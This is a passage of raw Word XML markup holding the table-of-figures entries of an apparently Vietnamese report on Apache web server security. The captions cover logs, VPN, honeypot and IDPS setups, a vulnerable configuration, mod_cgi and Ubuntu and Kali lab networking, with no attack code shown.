          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814817 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F83BE8E" w14:textId="322F8FFD" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814818" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00BB55E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2. 3: Log trên Apache</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814818 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C32166A" w14:textId="360A2861" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814819" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00BB55E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2. 4: Mô hình Web Server sử dụng VPN</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814819 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3892CFA1" w14:textId="46425D76" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814820" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00BB55E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2. 5: Mô hình Web Server sử dụng Honeypots</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814820 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73341546" w14:textId="080E2B9F" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814821" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00BB55E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2. 6: Mô hình Web Server sử dụng IDPS</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814821 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A189F66" w14:textId="77777777" w:rsidR="00C264FC" w:rsidRDefault="00C264FC" w:rsidP="00C264FC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Hình 3." </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA7F388" w14:textId="40F34774" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814825" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="0062232C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Hình 3. 1: </w:t>
        </w:r>
        <w:r w:rsidR="00C264FC" w:rsidRPr="0062232C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
            <w:spacing w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Logo Apache</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814825 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F367C54" w14:textId="0557DD1E" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814826" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="0062232C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3. 2: Apache vs Nginx</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814826 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="084C66C7" w14:textId="7216D618" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814827" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="0062232C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3. 3: Apache vs Tomcat</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814827 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50F2C1B5" w14:textId="06F2590B" w:rsidR="002C2195" w:rsidRDefault="00C264FC" w:rsidP="006F040E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002C2195">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002C2195">
        <w:instrText xml:space="preserve"> TOC \h \z \c "Hình 4." </w:instrText>
      </w:r>
      <w:r w:rsidR="002C2195">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFE22CF" w14:textId="188FE956" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085234" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 1: Code chuẩn hóa của Apache</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085234 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F8A21D0" w14:textId="1305DB3B" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085235" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 2: Cấu hình tồn tại lỗ hổng</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085235 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="613FEE65" w14:textId="3750BA24" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085236" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 3: Cách kích hoạt mod_cgi</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085236 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CA97D9E" w14:textId="2DDCD0F8" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085237" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 4: Cấu hình network Ubuntu</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085237 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D4509F0" w14:textId="096D7A57" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085238" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 5: Cấu hình network Kali</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085238 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C9B19A0" w14:textId="096B3360" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085239" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 6: Địa chỉ IP của Ubuntu</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085239 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0532D603" w14:textId="55CB94B7" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085240" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 7: Địa chỉ I</w:t>
        </w:r>
        <w:r w:rsidR="000063B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>P</w:t>
        </w:r>
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
